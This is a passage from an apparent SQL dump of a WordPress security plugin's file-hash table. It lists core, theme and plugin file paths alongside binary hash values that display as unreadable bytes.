b�q�Fԉ�','wp-content/themes/cactus/template-parts/post/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\nTM�~�zV�A�bb�','Dl凉�t�4\\q@����u�Zm��4�','',0,'?'),('���)�j��E�v�X','wp-content/themes/Endolf/header.php',0,'�7�A(�rN�2�T�a','�7�A(�rN�2�T�a','rU� �;�z� Ȼ�x$\n|��zF.��k��}M�','',0,'?'),('�� ��It13&','wp-admin/js/nav-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F0�ݶN��j�!�','����mn��hAɉg8��gj���m[)�B��','',0,'?'),('�_�nv�OfS���S!','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�>i�1L1��q�E4*','u\0yUM���ɪ���vU�Y`�I�A5xa�vN@','',0,'?'),('���G�l���ݠ_�','wp-includes/js/dist/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<� ���naO��{&��','v�������9@���~4��\\�y�)����','',0,'?'),('��~�m�-B���C�W','wp-content/themes/capacious/assets/js/wow.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B\n�Xh$q��G{','�(Jf����C!�7� �_��#B���Wd0Po','',0,'?'),('�0E&ʖtVw,�A��','wp-includes/wp-includes/images/media/document.png',0,'v�4�8�Αy�6�d�','v�4�8�Αy�6�d�','��ø`�������f I$ _Z�X�\"0\r��,','',0,'?'),('�J-狁��\\\"�ץ&�','wp-includes/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ğ�����WS�Rh?�I','� �\r��(�_�q*h7w@�L_C���s+','',0,'?'),('�#���!%f)��_�','wp-content/themes/hueman/option-tree/assets/images/layout/dual-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�.�����Z�̚�X','�sy?�1R�!�n��7������j�Ņ��','',0,'?'),('�;?2��S��\0��p','wp-admin/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w ���y����C>�','��vV��� v�b��\Z�[Zu�G� GnA�\"�H77','',0,'?'),('�VV��-13)�\nq�\0','wp-content/themes/newsmag/inc/customizer/settings/general/sections.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|;�qӲtP_�h�K','0�(�/J�?Tluø��t�{�������Y','',0,'?'),('�W�-�ى��|�Ǘ��','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-stop-users-enumeration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/��b�)EoB�$�w�M','�x�c�$I-=�VMjSd�b�6A;{��','',0,'?'),('�X��@��%�1C��i','wp-content/plugins/wordfence/images/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('�[�?��n2��\"d�d','wp-content/plugins/wp-cerber/assets/bn4ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8��L���uLT�','�TZ�G���~S-�{&M:�\r��/7O���T�','',0,'?'),('�]�.�1\rPXL�','wp-admin/includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^ �4j��/�?\\��','�V��a�U�ˁ�F�V���ߴYn$\ZӸ#�\'R�K�','',0,'?'),('�a�#(QD���h�G�V','wp-includes/wp-includes/ID3/module.audio-video.asf.php',0,'^�Oo�x�&]��\\L','^�Oo�x�&]��\\L','͆%F ��/\r���:�����0;>�_M3��w�','',0,'?'),('�f(�9��6��yaN|2','wp-content/plugins/wordfence/waf/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z^:@��JKL����S','�\rH����n`�>�--\\Tr���7,��','',0,'?'),('�l_S� 9�����[','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��4��)�R�>��i','�4xZP���]�QT[6�Z;����n���P�','',0,'?'),('�rY��\0�S���(z|�','wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Gb�yf��|��S���','�o��G5}[�`�n��x���ܡ^�@B#���lb','',0,'?'),('�s)�7���/M@);�','wp-content/themes/sg-window/img/icons/digg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dMp�aH_��W�e�','�\'o�~��k%�cAW��?�^�rbH\0A]�','',0,'?'),('�s8��\'��ɀ�\Z%Cx','wp-includes/blocks/archives/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�P*�5�\\�d\"Sn�','�/qkU����5i�#��-�̄aye�d̹�B:','',0,'?'),('�u$�{���ܨ��v�','wp-includes/blocks/latest-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��c\r9+@/K<�2','=�\n+rS�D;��|�Y}�VĒP[�o =]LJ','',0,'?'),('�~K�Ɂ�wwf�C�','wp-admin/js/widgets/media-gallery-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�c/����I���<�','�y�\\�R�T�ܠ�U�tmY�(��㻱̿','',0,'?'),('���X���,�R�6a','wp-content/themes/hueman/functions/czr/tmpl/modules/text_editor-module-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_E#�D�v+n�>','��?�7�VH�\r����j<�=hX=b�n�B�i','',0,'?'),('���6<\Z��a\0i�{��','wp-content/themes/spidermag/assets/library/ionicons/css/ionicons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� �|v�t9�){L','�O�D�㍢�n�>����rv���:R�Q','',0,'?'),('��}z��#����\Z','wp-includes/Requests/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','52]��{�}�� `X','�I?~�4���]4�����K��F��\"v�I(','',0,'?'),('���ƌ\Z��,�H��','wp-content/themes/twentynineteen/postcss.config.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xZ�SY�S�m\" ��a','�UYX�}�m�\",W�9:۸�.�෦Ho�\"�','',0,'?'),('��K���K�1�l�!�D','wp-content/themes/twentytwenty/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ƅ�&8����','̸����������\n�X���Gz�y�\\Kq�WQ','',0,'?'),('��\0ceU�`�{��g��','wp-content/plugins/wp-cerber/assets/flags/kr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�Uґ0Pl�{��ip','Zy���\Z�(�r��Q�N��ӌ���b�[P���','',0,'?'),('��\r���[��\0�EuJ','wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�̦���QK�#','�Q��]+N��[m^̋B���1��Ϗ��}�','',0,'?'),('��4�y�3%k� ����','wp-admin/js/widgets/media-image-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;k�#?��cQ7��(e','�o��{�\rr�h5��F�w�w� L�e�Fz�]�','',0,'?'),('�����_���Kk}��','wp-content/themes/spidermag/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�l���}\0�kS$����','NC�<�����.���aR>���CF����-','',0,'?'),('��3+�7��;��~�','wp-content/themes/promote/inc/kirki/assets/js/controls/color-palette.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��\0�]��\r�uǛ','�E&�VM��>(O��?H-�/#biCB�W','',0,'?'),('������|� ��','wp-includes/js/masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';?�&��T�Je�xH','$��!�|=#f�c�jc���:��T�Q0b�,ʉ�','',0,'?'),('��7�Î;�\' �|�Y','wp-content/themes/pine/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tM�l�;5˛}ʼ�-',':a��҆��Lo������q:�@�R���!+�','',0,'?'),('��Θ��r(��Ł�� ','wp-admin/js/auth-app.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���LP���S[��f�','F@H���8�݇��7an���#{�����j�','',0,'?'),('��nHHХR���?','wp-content/plugins/wp-cerber/assets/flags/gh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,La^���#d�e\'','��^�sV��z�3���:4�i�[��K���','',0,'?'),('��.����BǪ Y��','wp-content/themes/gambit/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\r�/�EWg>/�',' w�;���k�!�4�뾻:�{�` �]�t��j�j�','',0,'?'),('���v{C����ҧ��4I','wp-content/plugins/wordfence/lib/wfViewResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�����\"J�3Z��w','�m��e�=�H��oD���OT�\0�v���','',0,'?'),('��JL��[q��&�D=r','wp-includes/wp-includes/sitemaps/class-wp-sitemaps.php',0,'5.R�\0I�u�\'tV�','5.R�\0I�u�\'tV�','g���e��;�_~�_f/Pv��hm�H��g�','',0,'?'),('��p�$^���d�Z','wp-admin/network/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%(F��v\0�~��F','ڙs-s���~�uYe������T��F�4�!� *','',0,'?'),('�ګ�c\r2�8.�\'�\"','wp-content/themes/twentytwentyone/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?yO��+��D��','�\n=/��?I�l�b�i��8�A�HxV�5A?vi','',0,'?'),('��G��ۉ��\\}����','wp-content/plugins/wp-cerber/assets/flags/cc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� .-6����C#�','&��i��y�_��_����vV>�~���d','',0,'?'),('��[K���b���28�','wp-includes/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{K_��eG�@{ /','�G\n�{2����@k�ٗ��9Բ�1G9��P�','',0,'?'),('���o�(�\r�<�T�0n','wp-includes/wp-includes/cache-compat.php',0,'�?�Iq_��P�$ӄ','�?�Iq_��P�$ӄ','���]4\'��9���w�E��J�J�\r�nh�','',0,'?'),('���B�x��!JԖa��','wp-content/themes/pine/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x��(���-^�;�4�','�-ƣY���r����V=C�rC�,� ���-','',0,'?'),('��\r�\Z�Q��)�z3p','wp-content/themes/newsmag/assets/sass/layout/_header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���1^��PT9����8d','�ʄ��]\nj[;�^�K��i#�x���q^�t','',0,'?'),('�\0 �ݳI��&�\n��','wp-content/themes/sg-window/img/icons/small/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X\\I�ӱT�ŵ�\\=�u','��V\0k���6!N\'Z}\rO�/����S�Bk=�','',0,'?'),('�K��i��O�DR','wp-content/themes/vision-lite/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MS��Qnф̩�����','��O]w��f��R�jLZo<�qe���:L�','',0,'?'),('���X����J��p','wp-content/plugins/wordfence/lib/wfBrowscapCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T����Q�x�j�','�����1Y����T��Ј�q�W6���h ','',0,'?'),('�&½1YxFu����mpC','wp-content/themes/twentytwentyone/template-parts/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۏ�5����e����~7','r|1��� P.�;FvrF���0^�ػ� �R^��','',0,'?'),('�,�3�!x���7�N0��','wp-includes/wp-includes/class-wp-paused-extensions-storage.php',0,'%�ʤ�O��.�LX','%�ʤ�O��.�LX','UY����ޖ\\\nj6h��́��bYn��5��','',0,'?'),('�B�f�`vv��<�','wp-content/themes/promote/inc/kirki/assets/scss/controls/palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�Kf�<tv{�E','K�TA�ԢF�%\0W�E�7��8�\r�;=��','',0,'?'),('�S���q�`���M�','wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڡq�1�b��4� G*','{U%�Hv��3�)�|w��-L��&���.䌩','',0,'?'),('�n֢��\r�V5��,�','wp-includes/widgets/class-wp-widget-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ha�+��ޭj�s2���','f��\r`.\\�۬\r�����H�Pg���!M�w�m��','',0,'?'),('�o����l>��x~I� �','wp-admin/network/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���(���4�G�','��j/}Ӆ���\0E�S��̤\\Hg�#Z��._','',0,'?'),('�pJc#��bV���v�R�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php',0,'�b4�\'��&��','�b4�\'��&��','ۼ�4P\'���hN�a�>���E�5ఛ','',0,'?'),('��H�� �-�0f����','wp-content/themes/weblog/acmethemes/core/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!`l�����(','���c�C�{g����$�I�M��4]:Đ��','',0,'?'),('���0j�l�S�K�','wp-includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��Ԑ��[\"`}B','�)���v��\"�G��\"�YV<�Q�X :��','',0,'?'),('���$�N~��ɁU�T#0','wp-content/themes/capacious/assets/css/animate.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�=U�Y�-K�|�W�Y','\0t_����.]v;�\Z�Lj�^�/�\r��v �V','',0,'?'),('����ސ�q�ic�=�','wp-includes/class-wp-simplepie-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��88A�`�w+��p�T','�8u]�p�Q_�t�Rۮ]o}e5#�P5b2BU��','',0,'?'),('���Sq�R{�\Z���=','wp-includes/wp-includes/SimplePie/Author.php',0,'?��hK\0�k�1���N\"','?��hK\0�k�1���N\"','N����\\��pt3����+,l�\'�cOQ+�Z�','',0,'?'),('���\\z\r.����\Z�w~','wp-content/themes/vision-lite/js/jquery.nivo.slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P.�M<�����Q#\n�','O-r�rY�O���ga�/�- <��҄i2h�','',0,'?'),('��s�ՌQ��7o���','wp-content/plugins/wordfence/views/common/status-detail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ѿD�\0�|����s�W','�\n*�v�Q��(G��i�u�3@��4��*���','',0,'?'),('��\r����!\0#:����','wp-content/themes/advance/inc/kirki/assets/images/jquery.fs.stepper-arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/!C�\ra2���ռ;��2',' �^���$Vy˃0?�N�}�H6��?鶬','',0,'?'),('�«��-j=�u�N\\q\'','wp-admin/css/farbtastic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8)���}{��C�h2U','|A��L��Mb�x�d8X�jX.���^\n\Z�','',0,'?'),('���f�$��3��X','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-repeater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�G[G�>�A�\r0','��5�tbbF�v\"�k�<f�Rro���RdAxP�p','',0,'?'),('��ᗏ�3�-��4�','wp-admin/css/colors/midnight/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�]��4>�*I��w�','��خ`��$�%�T�{����rKN���k6��','',0,'?'),('����pF�&�P_','wp-includes/wp-includes/cache.php',0,'Z��V��O��yDv� !','Z��V��O��yDv� !','{�d���<>wb�S�q����B������','',0,'?'),('� �м��^�\0��v�','wp-content/themes/gambit/inc/widgets/widget-magazine-posts-grid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���iR�|���F�v','�4�T�\rϥ�H�I<\\~��z7ڞu�w�!7��}','',0,'?'),('�\"ڕK[@�G����9�','wp-admin/includes/class-wp-theme-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rz[�HH;nc�.u@�','��>�X�b]|$�Xq���@N�]m�Y�v�t��','',0,'?'),('�#��u0�c���}���','wp-includes/js/dist/i18n.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oO�W��,>7p����','0n`bl��y� �p�z]�Ջ,�^�+e��','',0,'?'),('�$�Q�sP���R3}/','wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@��9o;&�t���','C۞�`�)�t����f��K|j�����d�~','',0,'?'),('�3!9�=�6�ݡ','wp-admin/images/resize-rtl-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M���M�H�!�YA','�2��m�o��{�|�ny��˃�4(�φ�=�','',0,'?'),('�Dj{G�vga�Vt�=��','wp-content/themes/newsmag/assets/sass/site/secondary/_widget-posts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����T����#�v�Ro','B=/܆ºP~z&^���ivٗ��7�5m4*��','',0,'?'),('�Ioo�Ԇ5nu�ѭ��H','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�6F�\0f����','N��^q��yqܯ\r]�S��\\��[�C{V��y�w�','',0,'?'),('�X�A�<B�f���Qn','wp-content/themes/storeone/template-parts/home-product-tabs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"q���ks-V�!�^��','���R�H��*ߊ�5Jؽ�����4-Ĥ��C�','',0,'?'),('�Zg�Ui1i�ƾ�x�=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�W�,��XEE�o�','l?���)&&������P��P$@�\\�/�','',0,'?'),('�]�o/ԥ�˳�4DP��','wp-content/themes/maxbusiness/inc/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������J<-Z�x��','{j��\Zi�}5�j��\'``�/�s[�r2��M�4','',0,'?'),('�^2^�T��:�mJ��:�','wp-content/plugins/wordfence/lib/IPTrafList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�;s�ռ�;\0+g�','��T���D�H.1\0�B6�E?{��s��g\"��$�','',0,'?'),('�a����g4�DQM8 �Y','wp-content/themes/maxbusiness/template-parts/home-callout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�}�Ӧ�GX�','��ôի��OD�?aN��\"ߙ�\'���?|��}','',0,'?'),('�b�0݀>j�\"��G','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('���U���֫��o�V','wp-includes/wp-includes/js/api-request.js',0,'9����߿G7p6{�g','9����߿G7p6{�g','�d�6Q\\����f�:�����G`��j1V�','',0,'?'),('���n�Ioc�!���','wp-content/plugins/wp-cerber/assets/magnific/jquery.magnific-popup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�$Ȼ�����0bn','mS$^�|T�8�đ����=�ظ�l��F��`p�','',0,'?'),('�������e�5>X','wp-includes/wp-includes/js/tinymce/skins/lightgray/img/trans.gif',0,'��7I �1F�Gu�j^','��7I �1F�Gu�j^','�� �û���ͥJ��O�mO�:ϙ���l�W�5','',0,'?'),('���`���K�<8��','wp-content/themes/anima/cryout/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��\'��b�A�','P�<��!kQ\nN%{�zk\"أ�2��g`+��(}2�','',0,'?'),('���;��k�\'��$��','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-custom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w4z�:/X��(�X�','��aⓦhU�H �\r#j�⽋0!�;YD�k�','',0,'?'),('��~�s|,�nSub�)$','wp-content/themes/advance/inc/kirki/assets/css/transparency-grid.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[^��Q�Ǫ\r:;�5','��˝?��#�O ��C�M���\\�\n�\0VY','',0,'?'),('���:+I�t\"\r�t=�','wp-content/themes/event/inc/settings/event-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԛ4Pl4E\ZHeɞ�6�','3!NQk�������o�R\0��P��$TOK��','',0,'?'),('���c����Vs�9�o��','wp-includes/css/dist/editor/editor-styles-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#YR\nP��>�y�L�,','�4�A�&E(6��~�e�|vH��l�;���R�','',0,'?'),('��O��4����%m�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��?1� ���4��M�','e��2M�B���\n\0��7�0�Zz�F%�s','',0,'?'),('��sC<�:���<�A�','wp-includes/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:�Z{���5�o','���<�s�6��\0, Ra�uhX��c���','',0,'?'),('���2�I��h(Oe`���','wp-content/themes/auberge/library/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƒbr.*3��Nb6�',' #o�ۤ-;�v/��#�)\nGŕ[������','',0,'?'),('�ĥ[;����r','wp-content/themes/maxbusiness/images/slide3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����eF�n�<���','�.K���2$p�K��z&A�-���n�RT�','',0,'?'),('�����@�j=�','wp-content/plugins/wp-cerber/assets/sh/scripts/shBrushPhp.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nR�1G˕�\n���hc�','����� ��^b��V���l!�,�G�3/','',0,'?'),('��h�c��f:(����','wp-includes/wp-includes/random_compat/error_polyfill.php',0,'X:,��t]7�=��Q��E','X:,��t]7�=��Q��E','��,��t�\0_g�X%4.�tP�]�>�JT4','',0,'?'),('�;$:�`�,��p�','wp-content/themes/gambit/sidebar-small.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�a�/c |�N>�o�','�Vg$a�3��{�QX�j�67 Q��vR�c��x','',0,'?'),('�PK�3����q�','wp-content/themes/spidermag/spidermag/customwidget/widget-fifthblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J���%���Mc$','ݫ\'SSE���I��u~��R���i��F�Q��','',0,'?'),('�)[\"J�H��|�jk��$','wp-admin/js/customize-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\,yI����D�a','��}�u�}@�\Z�\\,�XK��r�;7f��','',0,'?'),('�=��~*���d�|`�','wp-content/themes/newsmag/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؕ�,dT�Y#�t\"[i','(CR?�ym��mw��YΓ��M��\Z�P ��>�#','',0,'?'),('�?Fϸ����A��R1�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��ԏ�d0��lN&7+','^s\n�@G,�ږ\n;|3P nԔ/\rzA�\"\nd','',0,'?'),('�@e�Sх�$q�/r�(','wp-content/themes/travel-stories/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R���\0>�#�R�','Z�WhgQ?���4~`C���Ӌ�������','',0,'?'),('�JTV0D��oTA[@�','wp-admin/options-discussion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��~�vg��3ܘ�','�lAt;��#�Tt�_�y\\S=���#:X٥j�','',0,'?'),('�WsC����:��%U�!','wp-content/themes/hueman/assets/admin/img/footer-widgets-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Zq\"�!�}�~Ձ','2T��J(�� |F�y̤�6�֩e�2�f�','',0,'?'),('�a�,�)���;��#�jb','wp-content/themes/storeone/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�{y%��e��)�','oY��v1�nf(�_�i�B|�|��c/�ƙN%��','',0,'?'),('��\\����\r� ��:#�K','wp-content/plugins/wp-cerber/assets/flags/bo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0-�a�vv��','=�IS}�@l��U�%s�=�FG41R�\'�','',0,'?'),('����S�8M�C��>��','wp-includes/js/dist/block-serialization-default-parser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K���fQ����^','9.��A�������b1�e�7@xR��w���','',0,'?'),('�����dD����+P�','wp-content/themes/twentytwenty/template-parts/modal-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]�xρ� �.��P�','=w��q��:��\'�`�CL,IH��E�Ǖ��\0�g','',0,'?'),('��L�@��V����k','wp-includes/wp-includes/images/toggle-arrow-2x.png',0,'F���\\����CDr�','F���\\����CDr�','-��N������7~@�}�_�=���V�_@A�','',0,'?'),('����S�h���S�%Tz�','wp-includes/js/mediaelement/wp-mediaelement.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%/NqOR�g��+\\�','F}\Z\n��v�n�`��Z�!�T��W����s','',0,'?'),('��������3���k�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-dashboard-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-����X>`b','�s��a�Ӌ�\0$T���bc8��dŅ���?>','',0,'?'),('��VϺz#���m)��','wp-content/themes/twentytwenty/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Χn��*�B\"�z���0B','��_\\�]-�V|���ʓO>;��O�$�Pw�2�','',0,'?'),('���q�V�Y4�n���|','wp-includes/wp-includes/js/jquery/ui/datepicker.js',0,'�4P1,ٝ�`x����','�4P1,ٝ�`x����','�]w\'��d�<s��6�>4Sڭ���s��/�=��','',0,'?'),('��.������I�\\�','wp-content/plugins/wp-cerber/assets/flags/jo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z>\Z�➶6�A3+Lh�','��\'\"5��zF��aLK�3pr��*�=�.>aq\"','',0,'?'),('���\"ܒ����nzD','wp-includes/SimplePie/Caption.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܊��y�u�D\r£�','\'�W1Q�5[ۋ�)��\r�85:��?*)K','',0,'?'),('���Wd�;C\r���O�','wp-content/plugins/akismet/views/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�.-Ҿ�z�<��D��','�Qǣd3ME�D��v/�Z�_a�!�/.�A1���','',0,'?'),('���^�?-+zG��>F=','wp-content/themes/capacious/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?t��R��0��Ĭ��_','��,k$�T�x���7�\n�l�*���`�|��','',0,'?'),('��ˋ�_o!\'�u��r','wp-content/plugins/wordfence/views/common/page-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)\Z���tU2Ec0\'�','�úM�..8��ѹ>Nw�j�Z����Wb��*B�','',0,'?'),('��Z\nu�oK� ��T;e','wp-admin/images/list.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��*�ӳ�S��','\\w��T[�=�b�aCk������;c���','',0,'?'),('��ll���x�L,7W�N�','wp-content/plugins/wordfence/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���\r$��o��','l�?�9Rw\"H�^�\r�s�������\ZD:�F�a','',0,'?'),('�\np#֕z�S�yT~','wp-content/themes/sg-window/inc/widget-button.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GZ��\n*�a>+ͮvO/','�?�����r�uZ>�h�[\"/�]��Y���:$�kp','',0,'?'),('������ `_','wp-content/themes/newsmag/assets/css/style.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�oC��~#P$�h�','%7q���s�����8f6�;b].�kT`���8l�r','',0,'?'),('���Uy/�*%��;','wp-admin/includes/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��4�-��͕*s','��qO��j�[��=�\\����rc�8�s�H�','',0,'?'),('�\rE��U���̈́��','wp-includes/images/wpspin-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('�W���P旃^q�y�','wp-content/plugins/wordfence/lib/menu_firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5X��P���K���','�S���P���A�_�l�W��2��?#_\rQ�x�','',0,'?'),('�Ղh��\0�q��','wp-content/themes/skt-pathway/images/hr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Y�oS����I 